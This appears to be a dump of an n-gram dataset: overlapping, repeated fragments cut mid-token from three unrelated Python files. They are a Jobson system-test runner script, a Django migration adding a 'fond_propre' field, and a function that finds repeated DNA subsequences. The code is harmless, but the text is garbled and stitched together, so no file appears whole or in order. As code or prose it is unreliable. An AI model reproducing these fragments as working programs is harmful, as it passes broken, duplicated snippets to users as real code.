ngram
listlengths
0
67.8k
[ "# # Licensed under the Apache License, Version 2.0 (the \"License\"); # you", "writing, software # distributed under the License is distributed on an \"AS IS\"", "directory containing jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The host running the", "type=str, help='The host running the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port", "main(argv=None): if argv is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system", "the API') parser.add_argument( 'password', type=str, help='The password to use the access the API')", "API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0 if", "KIND, either express or implied. # See the License for the specific language", "'specs_dir', type=str, help='Path to directory containing jobson specs (and tests)') parser.add_argument( 'host', type=str,", "Unless required by applicable law or agreed to in writing, software # distributed", "host running the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson", "You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "-*- # # Licensed under the Apache License, Version 2.0 (the \"License\"); #", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "# See the License for the specific language governing permissions and # limitations", "port the Jobson API is listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The", "parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0 if __name__ == \"__main__\":", "License. # You may obtain a copy of the License at # #", "Jobson API is listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to", "def main(argv=None): if argv is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson", "help='Path to directory containing jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The host", "governing permissions and # limitations under the License. # import argparse import sys", "law or agreed to in writing, software # distributed under the License is", "tests)') parser.add_argument( 'host', type=str, help='The host running the server (e.g. localhost)') parser.add_argument( 'port',", "type=str, help='The login to use to access the API') parser.add_argument( 'password', type=str, help='The", "the License for the specific language governing permissions and # limitations under the", "compliance with the License. # You may obtain a copy of the License", "specs (and tests)') parser.add_argument( 'host', type=str, help='The host running the server (e.g. localhost)')", "parser.add_argument( 'port', type=int, help='The port the Jobson API is listening on (e.g. 8080)')", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "this file except in compliance with the License. # You may obtain a", "API is listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to use", "the Apache License, Version 2.0 (the \"License\"); # you may not use this", "jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson specs (and", "you may not use this file except in compliance with the License. #", "access the API') parser.add_argument( 'password', type=str, help='The password to use the access the", "help='The port the Jobson API is listening on (e.g. 8080)') parser.add_argument( 'login', type=str,", "on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to use to access the", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str,", "parser.add_argument( 'host', type=str, help='The host running the server (e.g. localhost)') parser.add_argument( 'port', type=int,", "to use to access the API') parser.add_argument( 'password', type=str, help='The password to use", "the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson API is", "8080)') parser.add_argument( 'login', type=str, help='The login to use to access the API') parser.add_argument(", "password to use the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host,", "ANY KIND, either express or implied. # See the License for the specific", "is listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to use to", "in compliance with the License. # You may obtain a copy of the", "tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson specs (and tests)') parser.add_argument(", "use to access the API') parser.add_argument( 'password', type=str, help='The password to use the", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "use this file except in compliance with the License. # You may obtain", "and # limitations under the License. # import argparse import sys import jobson_systemtests", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "(e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to use to access the API')", "not use this file except in compliance with the License. # You may", "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See", "listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login to use to access", "the Jobson API is listening on (e.g. 8080)') parser.add_argument( 'login', type=str, help='The login", "use the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login,", "See the License for the specific language governing permissions and # limitations under", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "License, Version 2.0 (the \"License\"); # you may not use this file except", "login to use to access the API') parser.add_argument( 'password', type=str, help='The password to", "# Licensed under the Apache License, Version 2.0 (the \"License\"); # you may", "'password', type=str, help='The password to use the access the API') args = parser.parse_args(argv[1:])", "permissions and # limitations under the License. # import argparse import sys import", "IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "python3 # -*- coding: utf-8 -*- # # Licensed under the Apache License,", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "argv is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument(", "to directory containing jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The host running", "OF ANY KIND, either express or implied. # See the License for the", "jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0 if __name__ == \"__main__\": sys.exit(main())", "2.0 (the \"License\"); # you may not use this file except in compliance", "specific language governing permissions and # limitations under the License. # import argparse", "server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson API is listening", "'host', type=str, help='The host running the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The", "# you may not use this file except in compliance with the License.", "access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return", "argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson specs", "for the specific language governing permissions and # limitations under the License. #", "agreed to in writing, software # distributed under the License is distributed on", "(and tests)') parser.add_argument( 'host', type=str, help='The host running the server (e.g. localhost)') parser.add_argument(", "language governing permissions and # limitations under the License. # import argparse import", "the specific language governing permissions and # limitations under the License. # import", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the", "if argv is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests')", "limitations under the License. # import argparse import sys import jobson_systemtests def main(argv=None):", "jobson_systemtests def main(argv=None): if argv is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run", "coding: utf-8 -*- # # Licensed under the Apache License, Version 2.0 (the", "(the \"License\"); # you may not use this file except in compliance with", "argparse import sys import jobson_systemtests def main(argv=None): if argv is None: argv =", "type=int, help='The port the Jobson API is listening on (e.g. 8080)') parser.add_argument( 'login',", "argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path", "# # Unless required by applicable law or agreed to in writing, software", "express or implied. # See the License for the specific language governing permissions", "Version 2.0 (the \"License\"); # you may not use this file except in", "# Unless required by applicable law or agreed to in writing, software #", "except in compliance with the License. # You may obtain a copy of", "by applicable law or agreed to in writing, software # distributed under the", "type=str, help='The password to use the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run(", "copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "either express or implied. # See the License for the specific language governing", "jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The host running the server (e.g.", "# limitations under the License. # import argparse import sys import jobson_systemtests def", "License. # import argparse import sys import jobson_systemtests def main(argv=None): if argv is", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "help='The password to use the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir,", "parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson specs (and tests)') parser.add_argument( 'host',", "# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0", "may not use this file except in compliance with the License. # You", "License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "Licensed under the Apache License, Version 2.0 (the \"License\"); # you may not", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "file except in compliance with the License. # You may obtain a copy", "= parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0 if __name__ ==", "#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # Licensed under the Apache", "import jobson_systemtests def main(argv=None): if argv is None: argv = sys.argv parser =", "containing jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The host running the server", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "License for the specific language governing permissions and # limitations under the License.", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "import sys import jobson_systemtests def main(argv=None): if argv is None: argv = sys.argv", "parser.add_argument( 'login', type=str, help='The login to use to access the API') parser.add_argument( 'password',", "the License. # You may obtain a copy of the License at #", "to in writing, software # distributed under the License is distributed on an", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "-*- coding: utf-8 -*- # # Licensed under the Apache License, Version 2.0", "the License. # import argparse import sys import jobson_systemtests def main(argv=None): if argv", "'port', type=int, help='The port the Jobson API is listening on (e.g. 8080)') parser.add_argument(", "parser.add_argument( 'password', type=str, help='The password to use the access the API') args =", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password)", "implied. # See the License for the specific language governing permissions and #", "'login', type=str, help='The login to use to access the API') parser.add_argument( 'password', type=str,", "sys import jobson_systemtests def main(argv=None): if argv is None: argv = sys.argv parser", "\"License\"); # you may not use this file except in compliance with the", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "required by applicable law or agreed to in writing, software # distributed under", "args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0 if __name__", "import argparse import sys import jobson_systemtests def main(argv=None): if argv is None: argv", "system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson specs (and tests)')", "applicable law or agreed to in writing, software # distributed under the License", "help='The login to use to access the API') parser.add_argument( 'password', type=str, help='The password", "API') parser.add_argument( 'password', type=str, help='The password to use the access the API') args", "running the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson API", "or agreed to in writing, software # distributed under the License is distributed", "help='The host running the server (e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the", "or implied. # See the License for the specific language governing permissions and", "# import argparse import sys import jobson_systemtests def main(argv=None): if argv is None:", "= sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to", "type=str, help='Path to directory containing jobson specs (and tests)') parser.add_argument( 'host', type=str, help='The", "localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson API is listening on (e.g.", "the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port, login=args.login, password=args.password) return 0", "distributed under the License is distributed on an \"AS IS\" BASIS, # WITHOUT", "CONDITIONS OF ANY KIND, either express or implied. # See the License for", "Apache License, Version 2.0 (the \"License\"); # you may not use this file", "OR CONDITIONS OF ANY KIND, either express or implied. # See the License", "may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "= argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory containing jobson", "utf-8 -*- # # Licensed under the Apache License, Version 2.0 (the \"License\");", "to access the API') parser.add_argument( 'password', type=str, help='The password to use the access", "is None: argv = sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir',", "with the License. # You may obtain a copy of the License at", "(e.g. localhost)') parser.add_argument( 'port', type=int, help='The port the Jobson API is listening on", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "under the License. # import argparse import sys import jobson_systemtests def main(argv=None): if", "in writing, software # distributed under the License is distributed on an \"AS", "# -*- coding: utf-8 -*- # # Licensed under the Apache License, Version", "sys.argv parser = argparse.ArgumentParser(description='Run jobson system tests') parser.add_argument( 'specs_dir', type=str, help='Path to directory", "under the Apache License, Version 2.0 (the \"License\"); # you may not use", "to use the access the API') args = parser.parse_args(argv[1:]) jobson_systemtests.run( specs_dir=args.specs_dir, host=args.host, port=args.port," ]
[ "<filename>conventions/migrations/0008_auto_20210831_1707.py # Generated by Django 3.2.5 on 2021-08-31 15:07 from django.db import migrations,", "15:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"),", "= [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\", name=\"numero\", field=models.CharField(max_length=255, null=True), ),", "by Django 3.2.5 on 2021-08-31 15:07 from django.db import migrations, models class Migration(migrations.Migration):", "2021-08-31 15:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\",", "(\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\",", "Django 3.2.5 on 2021-08-31 15:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\",", "dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True),", "3.2.5 on 2021-08-31 15:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\",", "] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\", name=\"numero\", field=models.CharField(max_length=255,", "models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField(", "= [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ),", "Generated by Django 3.2.5 on 2021-08-31 15:07 from django.db import migrations, models class", "[ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\", name=\"numero\", field=models.CharField(max_length=255, null=True), ), ]", "import migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations =", "[ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField(", "# Generated by Django 3.2.5 on 2021-08-31 15:07 from django.db import migrations, models", "\"0007_auto_20210831_0908\"), ] operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\", name=\"numero\",", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ]", "on 2021-08-31 15:07 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations", "operations = [ migrations.AddField( model_name=\"convention\", name=\"fond_propre\", field=models.FloatField(null=True), ), migrations.AlterField( model_name=\"convention\", name=\"numero\", field=models.CharField(max_length=255, null=True),", "migrations, models class Migration(migrations.Migration): dependencies = [ (\"conventions\", \"0007_auto_20210831_0908\"), ] operations = [" ]
[ "length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution", "s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1", ">>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach", "'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ##", "['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution ***", "s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The Repeated subSequence is:", "`G`, `T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s =", "# Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def", "subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The Repeated subSequence", "is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The Repeated subSequence is:", "output = set() # iterate over all sequences of length for start in", "并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen = set() output", "简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen", "+ length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ ==", "__name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string:", "例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>>", "Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence,", "in range(n - length + 1): tmp = sequence[start:start + length] if tmp", "seen.add(tmp) return list(output) if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA'", "*** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length):", "'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L,", "DNA string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA", "f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n", "**test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s", "找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC',", "return list(output) if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For", "start in range(n - length + 1): tmp = sequence[start:start + length] if", "input DNA string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input", "findRepeatedDnaSequence(sequence, length): n = len(sequence) seen = set() output = set() # iterate", "if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__': s1", "length + 1): tmp = sequence[start:start + length] if tmp in seen: output.add(tmp[:])", "= sequence[start:start + length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if", ">>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA']", "sequence[start:start + length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__", "中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>>", "= \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s,", "# iterate over all sequences of length for start in range(n - length", "tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__': s1 =", "`ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s,", "findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(),", "s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>>", "长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen =", "1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence)", "length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s2, length=10)}\")", "tmp = sequence[start:start + length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output)", "list(output) if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input", "length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__':", "seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2", "set() output = set() # iterate over all sequences of length for start", "<gh_stars>0 \"\"\" 所有的DNA都是由一系列缩写为`A`, `C`, `G`, `T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test", "Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n =", "string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string:", "over all sequences of length for start in range(n - length + 1):", "{s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\"", "且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA']", "seen = set() output = set() # iterate over all sequences of length", "\"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10)", "for start in range(n - length + 1): tmp = sequence[start:start + length]", "all sequences of length for start in range(n - length + 1): tmp", "`T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\"", "## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n", "set() # iterate over all sequences of length for start in range(n -", "编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10)", "一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen = set() output =", "length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出", "{findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s2,", ">>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA'", "= 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1,", "length for start in range(n - length + 1): tmp = sequence[start:start +", "+ 1): tmp = sequence[start:start + length] if tmp in seen: output.add(tmp[:]) seen.add(tmp)", "def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen = set() output = set() #", "'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The Repeated subSequence", "The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The", "Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For input DNA string: {s2}\" f\"\\n The Repeated", "case** >>> s = \"AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT\" >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s =", "= set() # iterate over all sequences of length for start in range(n", "1): tmp = sequence[start:start + length] if tmp in seen: output.add(tmp[:]) seen.add(tmp) return", ">>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。", "`C`, `G`, `T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>> s", "range(n - length + 1): tmp = sequence[start:start + length] if tmp in", "output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 =", "'__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n", "左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen = set()", "所有的DNA都是由一系列缩写为`A`, `C`, `G`, `T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 